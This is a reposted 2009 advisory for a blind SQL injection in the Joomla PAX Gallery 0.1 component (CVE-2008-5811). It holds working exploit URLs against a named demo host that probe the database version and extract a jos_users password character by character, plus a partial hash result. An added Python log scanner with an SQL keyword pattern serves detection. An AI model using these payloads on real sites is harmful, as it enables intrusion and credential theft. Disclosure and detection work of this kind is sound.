Bug: Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability ( Ascii Version )


Joomla Component PAX Gallery 0.1 Blind SQL Injection Vulnerability

Published: 2009.01.06
Credit: XaDoS
Risk: High
CWE: CWE-89
CVE: CVE-2008-5811
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[] Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability

>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<


[] ExPL0iT:


|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL]


[] D£M0:

>Version:

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 [Ye$]

|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]


|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100

d8e423..ecc... ;-)

[] Th4nKs::

> Str0ke </ > Securitycode Team </ > StaKer </
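
Added example, not part of the original advisory: a log check a defender could run to spot requests like the ones shown above, where the gid parameter of com_paxgallery carries anything other than a plain integer. It assumes combined-format web server access logs and that legitimate gid values are integers; the function names, sample lines, hosts and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL keywords and the @@ variable prefix, as seen in the advisory's probes.
SQL_TOKENS = re.compile(r"\b(and|or|select|union|substring|ascii|from|limit)\b|@@", re.I)

def classify_gid(line):
    """None: not a com_paxgallery request with gid. Otherwise 'ok' (integer),
    'sqli-probe' (SQL tokens in gid) or 'non-numeric' (anything else)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs percent-decodes values, so %20 and %3E are seen as ' ' and '>'.
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if query.get("option") != ["com_paxgallery"] or "gid" not in query:
        return None
    verdicts = set()
    for gid in query["gid"]:  # a repeated gid parameter is checked in full
        if re.fullmatch(r"[0-9]+", gid):
            verdicts.add("ok")
        elif SQL_TOKENS.search(gid):
            verdicts.add("sqli-probe")
        else:
            verdicts.add("non-numeric")
    # Report the most severe verdict found.
    return next(v for v in ("sqli-probe", "non-numeric", "ok") if v in verdicts)

def scan(lines):
    """Return (client address, verdict) for every suspicious request."""
    hits = []
    for line in lines:
        verdict = classify_gid(line)
        if verdict in ("sqli-probe", "non-numeric"):
            hits.append((line.split()[0], verdict))
    return hits

# Constructed sample log lines; hosts and addresses are documentation values.
PREFIX = '- - [06/Jan/2009:10:00:00 +0000] "GET /index.php?option='
SAMPLE_LOG = [
    f'192.0.2.10 {PREFIX}com_paxgallery&task=table&gid=1 HTTP/1.1" 200 5120',
    f'192.0.2.77 {PREFIX}com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    f'192.0.2.80 {PREFIX}com_paxgallery&task=table&gid=abc HTTP/1.1" 200 812',
    f'192.0.2.81 {PREFIX}com_content&gid=1%20and%201=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

The non-integer check is the durable signal here; the keyword list only labels the hit and should not be relied on as the sole filter.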

Copyright 2014, cxsecurity.com